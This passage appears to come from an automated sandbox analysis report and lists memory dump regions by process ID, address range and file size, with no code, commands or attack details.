                                                                                                                                                                                                                                                                                            • memory/3496-66-0x00000000735E0000-0x0000000073D91000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                                                                                                            • memory/3496-54-0x0000000003640000-0x0000000005640000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              32.0MB

                                                                                                                                                                                                                                                                                            • memory/3496-48-0x00000000735E0000-0x0000000073D91000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                                                                                                            • memory/3496-47-0x0000000000FC0000-0x0000000001012000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                                            • memory/3696-597-0x0000000140000000-0x0000000140786000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              7.5MB

                                                                                                                                                                                                                                                                                            • memory/3696-684-0x0000000140000000-0x0000000140786000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              7.5MB

                                                                                                                                                                                                                                                                                            • memory/3840-251-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                            • memory/3840-244-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                            • memory/3932-148-0x00000000063A0000-0x00000000063DC000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              240KB

                                                                                                                                                                                                                                                                                            • memory/3932-357-0x0000000007B20000-0x000000000804C000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                            • memory/3932-362-0x00000000078F0000-0x0000000007940000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                                            • memory/3932-356-0x0000000007420000-0x00000000075E2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                                            • memory/3932-301-0x0000000006650000-0x00000000066B6000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                            • memory/3932-112-0x0000000000330000-0x0000000000382000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                                            • memory/3932-113-0x0000000005220000-0x00000000057C6000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5.6MB

                                                                                                                                                                                                                                                                                            • memory/3932-114-0x0000000004D50000-0x0000000004DE2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              584KB

                                                                                                                                                                                                                                                                                            • memory/3932-115-0x0000000004D20000-0x0000000004D2A000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                            • memory/3932-131-0x0000000005850000-0x00000000058C6000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              472KB

                                                                                                                                                                                                                                                                                            • memory/3932-133-0x0000000006170000-0x000000000618E000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                            • memory/3932-136-0x00000000068B0000-0x0000000006EC8000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              6.1MB

                                                                                                                                                                                                                                                                                            • memory/3932-149-0x0000000006510000-0x000000000655C000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                            • memory/3932-147-0x0000000006340000-0x0000000006352000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                            • memory/3932-146-0x0000000006400000-0x000000000650A000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                            • memory/4052-763-0x00000000005D0000-0x0000000000C44000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                            • memory/4052-611-0x00000000005D0000-0x0000000000C44000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                            • memory/4052-639-0x0000000010000000-0x00000000105E1000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5.9MB

                                                                                                                                                                                                                                                                                            • memory/4268-232-0x0000000000C80000-0x0000000000CAE000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              184KB

                                                                                                                                                                                                                                                                                            • memory/4352-825-0x0000000005190000-0x00000000051DC000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                            • memory/4452-2-0x0000000000FB0000-0x000000000146B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                                            • memory/4452-0-0x0000000000FB0000-0x000000000146B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                                            • memory/4452-7-0x0000000005A00000-0x0000000005A01000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-1-0x0000000077C26000-0x0000000077C28000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4452-6-0x00000000059F0000-0x00000000059F1000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-5-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-4-0x0000000005A10000-0x0000000005A11000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-3-0x0000000005A20000-0x0000000005A21000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-10-0x0000000005A70000-0x0000000005A71000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-9-0x0000000005A80000-0x0000000005A81000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4452-15-0x0000000000FB0000-0x000000000146B000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                                            • memory/4664-256-0x000000001DAC0000-0x000000001DBCA000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                            • memory/4664-285-0x000000001E6D0000-0x000000001E892000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                                            • memory/4664-268-0x000000001D9F0000-0x000000001DA0E000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                            • memory/4664-267-0x000000001E050000-0x000000001E0C6000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              472KB

                                                                                                                                                                                                                                                                                            • memory/4664-260-0x000000001DA10000-0x000000001DA4C000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              240KB

                                                                                                                                                                                                                                                                                            • memory/4664-259-0x000000001D9B0000-0x000000001D9C2000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                            • memory/4664-286-0x000000001EDD0000-0x000000001F2F8000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                            • memory/4664-132-0x0000000000830000-0x00000000008F0000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              768KB

                                                                                                                                                                                                                                                                                            • memory/4696-91-0x0000000000400000-0x000000000044E000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              312KB

                                                                                                                                                                                                                                                                                            • memory/4696-92-0x0000000000400000-0x000000000044E000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              312KB

                                                                                                                                                                                                                                                                                            • memory/4748-411-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                            • memory/4852-1186-0x0000000001E20000-0x0000000002401000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5.9MB

                                                                                                                                                                                                                                                                                            • memory/4984-72-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.6MB